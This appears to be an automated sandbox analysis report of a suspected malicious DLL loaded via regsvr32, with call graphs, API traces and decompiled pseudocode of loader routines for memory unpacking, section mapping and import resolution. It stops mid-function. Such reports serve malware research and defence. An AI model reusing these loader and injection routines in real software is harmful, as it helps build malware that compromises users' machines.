15708 67d3162a 15708->15697 15710 67d3142b 15709->15710 15715 67d313c7 15709->15715 15711 67d31478 15710->15711 15712 67d33da6 _free 41 API calls 15710->15712 15713 67d39444 ___free_lc_time 41 API calls 15711->15713 15734 67d314a1 15711->15734 15714 67d3144c 15712->15714 15716 67d31496 15713->15716 15719 67d33da6 _free 41 API calls 15714->15719 15715->15710 15717 67d313f8 15715->15717 15721 67d33da6 _free 41 API calls 15715->15721 15722 67d33da6 _free 41 API calls 15716->15722 15718 67d31416 15717->15718 15728 67d33da6 _free 41 API calls 15717->15728 15720 67d33da6 _free 41 API calls 15718->15720 15724 67d3145f 15719->15724 15725 67d31420 15720->15725 15726 67d313ed 15721->15726 15722->15734 15723 67d31500 15727 67d33da6 _free 41 API calls 15723->15727 15729 67d33da6 _free 41 API calls 15724->15729 15730 67d33da6 _free 41 API calls 15725->15730 15731 67d38d02 ___free_lconv_mon 41 API calls 15726->15731 15732 67d31506 15727->15732 15733 67d3140b 15728->15733 15735 67d3146d 15729->15735 15730->15710 15731->15717 15732->15705 15736 67d391d7 ___free_lconv_num 41 API calls 15733->15736 15734->15723 15737 67d33da6 41 API calls _free 15734->15737 15738 67d33da6 _free 41 API calls 15735->15738 15736->15718 15737->15734 15738->15711 15739->15708 15741 67d3187e 15740->15741 15747 67d317d4 15740->15747 15744 67d2b899 __output_s_l 6 API calls 15741->15744 15746 67d3192a 15744->15746 15746->15669 15750 67d3a3fe 15747->15750 15749 67d3a2a2 ___crtLCMapStringA 45 API calls 15749->15741 15751 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15750->15751 15752 67d3a40f 15751->15752 15760 67d3a306 15752->15760 15755 67d3a2a2 15756 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15755->15756 15757 67d3a2b3 15756->15757 15777 67d3a059 15757->15777 15761 67d3a320 15760->15761 15762 67d3a32d MultiByteToWideChar 15760->15762 15761->15762 15763 67d3a352 15762->15763 15766 67d3a359 15762->15766 15764 67d2b899 __output_s_l 6 API calls 15763->15764 15765 67d31835 15764->15765 
15765->15755 15767 67d34e76 _malloc 41 API calls 15766->15767 15769 67d3a37b _memset __crtGetStringTypeA_stat 15766->15769 15767->15769 15768 67d3a3b7 MultiByteToWideChar 15770 67d3a3e1 15768->15770 15771 67d3a3d1 GetStringTypeW 15768->15771 15769->15763 15769->15768 15773 67d3a2e8 15770->15773 15771->15770 15774 67d3a2f2 15773->15774 15775 67d3a303 15773->15775 15774->15775 15776 67d33da6 _free 41 API calls 15774->15776 15775->15763 15776->15775 15779 67d3a072 MultiByteToWideChar 15777->15779 15785 67d3a0d8 15779->15785 15791 67d3a0d1 15779->15791 15780 67d2b899 __output_s_l 6 API calls 15781 67d31856 15780->15781 15781->15749 15782 67d3a137 MultiByteToWideChar 15783 67d3a19e 15782->15783 15784 67d3a150 15782->15784 15788 67d3a2e8 __freea 41 API calls 15783->15788 15802 67d3ee53 15784->15802 15786 67d34e76 _malloc 41 API calls 15785->15786 15789 67d3a100 __crtGetStringTypeA_stat 15785->15789 15786->15789 15788->15791 15789->15782 15789->15791 15790 67d3a164 15790->15783 15792 67d3a17a 15790->15792 15794 67d3a1a6 15790->15794 15791->15780 15792->15783 15793 67d3ee53 __crtLCMapStringA_stat LCMapStringW 15792->15793 15793->15783 15797 67d34e76 _malloc 41 API calls 15794->15797 15800 67d3a1ce __crtGetStringTypeA_stat 15794->15800 15795 67d3ee53 __crtLCMapStringA_stat LCMapStringW 15796 67d3a211 15795->15796 15798 67d3a239 15796->15798 15801 67d3a22b WideCharToMultiByte 15796->15801 15797->15800 15799 67d3a2e8 __freea 41 API calls 15798->15799 15799->15783 15800->15783 15800->15795 15801->15798 15803 67d3ee7e __crtLCMapStringA_stat 15802->15803 15804 67d3ee63 15802->15804 15805 67d3ee95 LCMapStringW 15803->15805 15804->15790 15805->15790 15806->15674 15808 67d35a12 TlsFree 15807->15808 15809 67d35a0e 15807->15809 15808->15268 15809->15268 15812 67d3553e 15810->15812 15815 67d355a2 15812->15815 15816 67d45d54 15812->15816 15813 67d354bf 15813->15280 15813->15282 15814 67d45d54 _parse_cmdline 41 API calls 15814->15815 15815->15813 15815->15814 15819 67d45b3a 15816->15819 
15820 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15819->15820 15821 67d45b4c 15820->15821 15821->15812 15823 67d37e0d RtlEncodePointer 15822->15823 15823->15823 15824 67d37e27 15823->15824 15824->15288 15828 67d2c430 15825->15828 15827 67d2c537 15827->15290 15829 67d2c43c __CRT_INIT@12 15828->15829 15836 67d3387a 15829->15836 15835 67d2c463 __CRT_INIT@12 15835->15827 15837 67d381ad __lock 41 API calls 15836->15837 15838 67d2c445 15837->15838 15839 67d2c474 15838->15839 15841 67d2c489 15839->15841 15840 67d2c451 15850 67d2c46e 15840->15850 15841->15840 15853 67d339cf 15841->15853 15843 67d2c504 RtlEncodePointer RtlEncodePointer 15843->15840 15844 67d2c4b3 15844->15843 15845 67d2c4d8 15844->15845 15860 67d33a8f 15844->15860 15845->15840 15847 67d33a8f __realloc_crt 44 API calls 15845->15847 15848 67d2c4f2 RtlEncodePointer 15845->15848 15849 67d2c4ec 15847->15849 15848->15843 15849->15840 15849->15848 15887 67d33883 15850->15887 15854 67d339d8 15853->15854 15855 67d339ed RtlSizeHeap 15853->15855 15856 67d30e90 _rand_s 41 API calls 15854->15856 15855->15844 15857 67d339dd 15856->15857 15858 67d2dee7 _rand_s 8 API calls 15857->15858 15859 67d339e8 15858->15859 15859->15844 15864 67d33a96 15860->15864 15862 67d33ad3 15862->15845 15864->15862 15865 67d3f768 15864->15865 15886 67d35eaf Sleep 15864->15886 15866 67d3f771 15865->15866 15867 67d3f77c 15865->15867 15868 67d34e76 _malloc 41 API calls 15866->15868 15869 67d3f784 15867->15869 15880 67d3f791 15867->15880 15870 67d3f779 15868->15870 15871 67d33da6 _free 41 API calls 15869->15871 15870->15864 15885 67d3f78c _rand_s 15871->15885 15872 67d3f7c9 15874 67d34f53 _malloc RtlDecodePointer 15872->15874 15873 67d3f799 RtlReAllocateHeap 15873->15880 15873->15885 15875 67d3f7cf 15874->15875 15877 67d30e90 _rand_s 41 API calls 15875->15877 15876 67d3f7f9 15879 67d30e90 _rand_s 41 API calls 15876->15879 15877->15885 15878 67d34f53 _malloc RtlDecodePointer 15878->15880 15881 67d3f7fe GetLastError 15879->15881 15880->15872 
15880->15873 15880->15876 15880->15878 15882 67d3f7e1 15880->15882 15881->15885 15883 67d30e90 _rand_s 41 API calls 15882->15883 15884 67d3f7e6 GetLastError 15883->15884 15884->15885 15885->15864 15886->15864 15890 67d38337 RtlLeaveCriticalSection 15887->15890 15889 67d2c473 15889->15835 15890->15889 15892 67d3f887 15891->15892 15898 67d3f8a2 15891->15898 15893 67d3f893 15892->15893 15892->15898 15894 67d30e90 _rand_s 40 API calls 15893->15894 15896 67d3f898 15894->15896 15895 67d3f8b2 RtlAllocateHeap 15895->15896 15895->15898 15896->15332 15897 67d34f53 _malloc RtlDecodePointer 15897->15898 15898->15895 15898->15896 15898->15897 15899->15335 15906 67d38337 RtlLeaveCriticalSection 15900->15906 15902 67d320df 15902->15345 15907 67d38337 RtlLeaveCriticalSection 15903->15907 15905 67d3212d 15905->15348 15906->15902 15907->15905 15910 67d31e96 __CRT_INIT@12 15908->15910 15909 67d31eaf 15913 67d31ebe 15909->15913 15914 67d33da6 _free 41 API calls 15909->15914 15910->15909 15911 67d31f9e __CRT_INIT@12 15910->15911 15912 67d33da6 _free 41 API calls 15910->15912 15911->15362 15912->15909 15915 67d31ecd 15913->15915 15916 67d33da6 _free 41 API calls 15913->15916 15914->15913 15917 67d31edc 15915->15917 15918 67d33da6 _free 41 API calls 15915->15918 15916->15915 15919 67d31eeb 15917->15919 15920 67d33da6 _free 41 API calls 15917->15920 15918->15917 15921 67d33da6 _free 41 API calls 15919->15921 15922 67d31efa 15919->15922 15920->15919 15921->15922 15923 67d31f09 15922->15923 15924 67d33da6 _free 41 API calls 15922->15924 15925 67d31f1b 15923->15925 15926 67d33da6 _free 41 API calls 15923->15926 15924->15923 15927 67d381ad __lock 41 API calls 15925->15927 15926->15925 15931 67d31f23 15927->15931 15928 67d31f46 15940 67d31faa 15928->15940 15931->15928 15933 67d33da6 _free 41 API calls 15931->15933 15932 67d381ad __lock 41 API calls 15938 67d31f5a ___removelocaleref 15932->15938 15933->15928 15934 67d31f8b 15943 67d31fb6 15934->15943 15937 67d33da6 _free 41 API calls 
15937->15911 15938->15934 15939 67d313b2 ___freetlocinfo 41 API calls 15938->15939 15939->15934 15946 67d38337 RtlLeaveCriticalSection 15940->15946 15942 67d31f53 15942->15932 15947 67d38337 RtlLeaveCriticalSection 15943->15947 15945 67d31f98 15945->15937 15946->15942 15947->15945 15950 67d4f23c ___DllMainCRTStartup 15948->15950 15949 67d4fbb4 GetEnvironmentVariableA 15949->15950 15950->15949 15951 67d4ff9e 15950->15951 15954 67da18f0 15951->15954 15955 67da192c strtoxq 15954->15955 15956 67da1a10 GetTempPathA VirtualProtect 15955->15956 15957 67da1adf 15956->15957 15957->15957 15958 67cd1dae 15959 67cd1dc4 15958->15959 15960 67cd1e33 InterlockedDecrement 15958->15960 15961 67cd1dcb InterlockedIncrement 15959->15961 15966 67cd1e1e 15959->15966 15962 67cd1e42 15960->15962 15960->15966 15964 67cd1dde HeapCreate 15961->15964 15961->15966 15963 67cd1e74 HeapDestroy 15962->15963 15965 67cd1e4f SleepEx 15962->15965 15968 67cd1e68 CloseHandle 15962->15968 15963->15966 15964->15966 15967 67cd1df4 15964->15967 15965->15962 15965->15968 15969 67cd13d1 6 API calls 15967->15969 15968->15963 15969->15966 15970 67cd14e8 ConvertStringSecurityDescriptorToSecurityDescriptorA 15971 67cd1697 3 API calls 15970->15971 15972 67cd1543 15971->15972 15973 67cd1598 ExitThread 15972->15973 15974 67cd1547 lstrlenW 15972->15974 15980 67cd1144 GetSystemTimeAsFileTime _aulldiv _snwprintf 15974->15980 15979 67cd156a 15991 67cd1444 15979->15991 15981 67cd119d 15980->15981 15982 67cd11a2 CreateFileMappingW 15980->15982 15981->15982 15983 67cd11bd 15982->15983 15984 67cd1205 GetLastError 15982->15984 15985 67cd11c8 GetLastError 15983->15985 15986 67cd11d6 MapViewOfFile 15983->15986 15987 67cd11e6 15984->15987 15985->15986 15988 67cd11d1 15985->15988 15986->15987 15989 67cd11f4 GetLastError 15986->15989 15987->15979 15990 67cd11fc CloseHandle 15988->15990 15989->15987 15989->15990 15990->15987 16004 67cd1060 15991->16004 15995 67cd148e 15998 67cd14ca 15995->15998 16021 67cd1f7c 15995->16021 16032 
67cd142f HeapFree 15998->16032 16002 67cd14dc GetWindowLongW 16002->15973 16003 67cd14c2 GetLastError 16003->15998 16033 67cd1b58 HeapAlloc 16004->16033 16006 67cd106e 16007 67cd1078 GetModuleHandleA GetProcAddress 16006->16007 16016 67cd1124 16006->16016 16008 67cd10af GetProcAddress 16007->16008 16015 67cd111d 16007->16015 16009 67cd10c5 GetProcAddress 16008->16009 16008->16015 16011 67cd10db GetProcAddress 16009->16011 16009->16015 16012 67cd10f1 GetProcAddress 16011->16012 16011->16015 16013 67cd1107 16012->16013 16012->16015 16034 67cd1b9c NtCreateSection 16013->16034 16015->16016 16040 67cd142f HeapFree 16015->16040 16016->16002 16017 67cd1a5a memcpy 16016->16017 16018 67cd1aca 16017->16018 16019 67cd1a93 16017->16019 16018->15995 16019->16018 16020 67cd1aac memcpy 16019->16020 16020->16019 16023 67cd149f 16021->16023 16024 67cd1f9f 16021->16024 16022 67cd1fb0 LoadLibraryA 16022->16023 16022->16024 16023->15998 16027 67cd126d VirtualProtect 16023->16027 16024->16022 16024->16023 16026 67cd2019 16024->16026 16025 67cd2022 GetProcAddress 16025->16026 16026->16024 16026->16025 16028 67cd1345 16027->16028 16029 67cd12b6 16027->16029 16028->15998 16028->16003 16029->16028 16030 67cd130c VirtualProtect 16029->16030 16030->16029 16031 67cd1321 GetLastError 16030->16031 16031->16029 16032->16002 16033->16006 16035 67cd1c00 16034->16035 16038 67cd1c2d 16034->16038 16041 67cd1ec7 NtMapViewOfSection 16035->16041 16038->16015 16039 67cd1c14 memset 16039->16038 16040->16016 16042 67cd1c0e 16041->16042 16042->16038 16042->16039

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,67DA6BE0), ref: 67DA7245
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,67DA6C41), ref: 67DA727C
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 67DA72DC
                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 67DA7312
                                                                                                                                                                  • VirtualProtect.KERNEL32(67CD0000,00000000,00000004,67DA7167), ref: 67DA7417
                                                                                                                                                                  • VirtualProtect.KERNEL32(67CD0000,00001000,00000004,67DA7167), ref: 67DA743E
                                                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,67DA7167), ref: 67DA750B
                                                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,67DA7167,?), ref: 67DA7561
                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 67DA757D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                                                  • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
                                                                                                                                                                  • Instruction ID: 3ff169ea8b7e0bdc79e6c17ae9ea834bc60de64deb3f8f155b863d76817926b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD18176500102EFDB16CF44C8A0B51B7A5FF89310B1B4994ED5AEF3DAD771A80ACB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E67CD1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				struct _FILETIME* _v16;
                                                                                                                                                                  				short _v60;
                                                                                                                                                                  				struct _FILETIME* _t14;
                                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                                  				long _t18;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  				void* _t22;
                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                  				long _t32;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  
                                                                                                                                                                  				_t31 = __edx;
                                                                                                                                                                  				_t14 =  &_v16;
                                                                                                                                                                  				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                  				_push(0x192);
                                                                                                                                                                  				_push(0x54d38000);
                                                                                                                                                                  				_push(_v12);
                                                                                                                                                                  				_push(_v16);
                                                                                                                                                                  				L67CD2210();
                                                                                                                                                                  				_push(_t14);
                                                                                                                                                                  				_v16 = _t14;
                                                                                                                                                                  				_t15 =  *0x67cd41d0;
                                                                                                                                                                  				_push(_t15 + 0x67cd505e);
                                                                                                                                                                  				_push(_t15 + 0x67cd5054);
                                                                                                                                                                  				_push(0x16);
                                                                                                                                                                  				_push( &_v60);
                                                                                                                                                                  				_v12 = _t31;
                                                                                                                                                                  				L67CD220A();
                                                                                                                                                                  				_t18 = _a4;
                                                                                                                                                                  				if(_t18 == 0) {
                                                                                                                                                                  					_t18 = 0x1000;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t19 = CreateFileMappingW(0xffffffff, 0x67cd41c0, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                  				_t34 = _t19;
                                                                                                                                                                  				if(_t34 == 0) {
                                                                                                                                                                  					_t32 = GetLastError();
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                                                  							_t32 = GetLastError();
                                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							 *_a8 = _t34;
                                                                                                                                                                  							 *_a12 = _t22;
                                                                                                                                                                  							_t32 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t32 = 2;
                                                                                                                                                                  						L9:
                                                                                                                                                                  						CloseHandle(_t34);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t32;
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?,?), ref: 67CD1151
                                                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 67CD1167
                                                                                                                                                                  • _snwprintf.NTDLL ref: 67CD118C
                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,67CD41C0,00000004,00000000,?,?), ref: 67CD11B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11C8
                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 67CD11DC
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11F4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A), ref: 67CD11FD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD1205
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1724014008-0
                                                                                                                                                                  • Opcode ID: 05cbb1e3fa604ac3b7cf2d7927c3c8084f48b9021c80cbc2231a50d921d5de10
                                                                                                                                                                  • Instruction ID: 3acab1d038559957b179821649014311177ae86c16968862481eebb2bd9197c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 05cbb1e3fa604ac3b7cf2d7927c3c8084f48b9021c80cbc2231a50d921d5de10
                                                                                                                                                                  • Instruction Fuzzy Hash: CD2168B2640108EFDB11AFACCCC5E9E7BB8EB4A350F124125FB25E6180E635A945CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: T$W
                                                                                                                                                                  • API String ID: 0-2417195663
                                                                                                                                                                  • Opcode ID: 5a18941386d8b5c66ea59cee1fa0ca2b10e5a45d2b8103b9a6c55eeafce31005
                                                                                                                                                                  • Instruction ID: e7357edc0c8b64af0a309202930c321a0dd906dc0e0cee9cb8ec63d459bebf31
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a18941386d8b5c66ea59cee1fa0ca2b10e5a45d2b8103b9a6c55eeafce31005
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C9292B560A351CFDB04CF28C49125EBBE1BB9A324F484E2EE496C7355D3389889CF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 419 67cd1b9c-67cd1bfe NtCreateSection 420 67cd1c35-67cd1c39 419->420 421 67cd1c00-67cd1c09 call 67cd1ec7 419->421 425 67cd1c3b-67cd1c41 420->425 424 67cd1c0e-67cd1c12 421->424 426 67cd1c2d-67cd1c33 424->426 427 67cd1c14-67cd1c2b memset 424->427 426->425 427->425
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E67CD1B9C(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				int _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				int _v40;
                                                                                                                                                                  				int _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				long _t34;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                                                  
                                                                                                                                                                  				_t48 = __eax;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v48 = 0x18;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v36 = 0x40;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                  				if(_t34 < 0) {
                                                                                                                                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					 *_t48 = _v16;
                                                                                                                                                                  					_t39 = E67CD1EC7(_t48,  &_v12); // executed
                                                                                                                                                                  					_t47 = _t39;
                                                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						memset(_v12, 0, _v24);
                                                                                                                                                                  						 *_a4 = _v12;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t47;
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 67CD1BF9
                                                                                                                                                                    • Part of subcall function 67CD1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,67CD1C0E,00000002,00000000,?,?,00000000,?,?,67CD1C0E,00000000), ref: 67CD1EF4
                                                                                                                                                                  • memset.NTDLL ref: 67CD1C1B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
• Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
• Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
• Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Section$CreateViewmemset
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2533685722-2766056989
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%


                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E67CD1E8A(void* __ecx) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				signed short _t7;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                                  					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                  					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1E9F
                                                                                                                                                                  • GetSystemDefaultUILanguage.KERNEL32(?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1EA9
                                                                                                                                                                  • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1EBC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
• Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
• Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
• Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3724080410-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1F7C(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr* _v12;
                                                                                                                                                                  				_Unknown_base(*)()** _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				signed short _v24;
                                                                                                                                                                  				struct HINSTANCE__* _v28;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                                  				struct HINSTANCE__* _t47;
                                                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                                  				signed short _t51;
                                                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                                                  				CHAR* _t54;
                                                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                                                  				void* _t58;
                                                                                                                                                                  				signed int _t59;
                                                                                                                                                                  				_Unknown_base(*)()* _t60;
                                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                                  				intOrPtr _t65;
                                                                                                                                                                  				signed int _t68;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				CHAR* _t71;
                                                                                                                                                                  				signed short* _t73;
                                                                                                                                                                  
                                                                                                                                                                  				_t69 = __edi;
                                                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                                                  				_t59 =  *0x67cd41cc;
                                                                                                                                                                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                                                  					_t45 = _t43 + __edi;
                                                                                                                                                                  					_v12 = _t45;
                                                                                                                                                                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t71 = _t46 + _t69;
                                                                                                                                                                  							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                  							_v28 = _t47;
                                                                                                                                                                  							if(_t47 == 0) {
                                                                                                                                                                  								break;
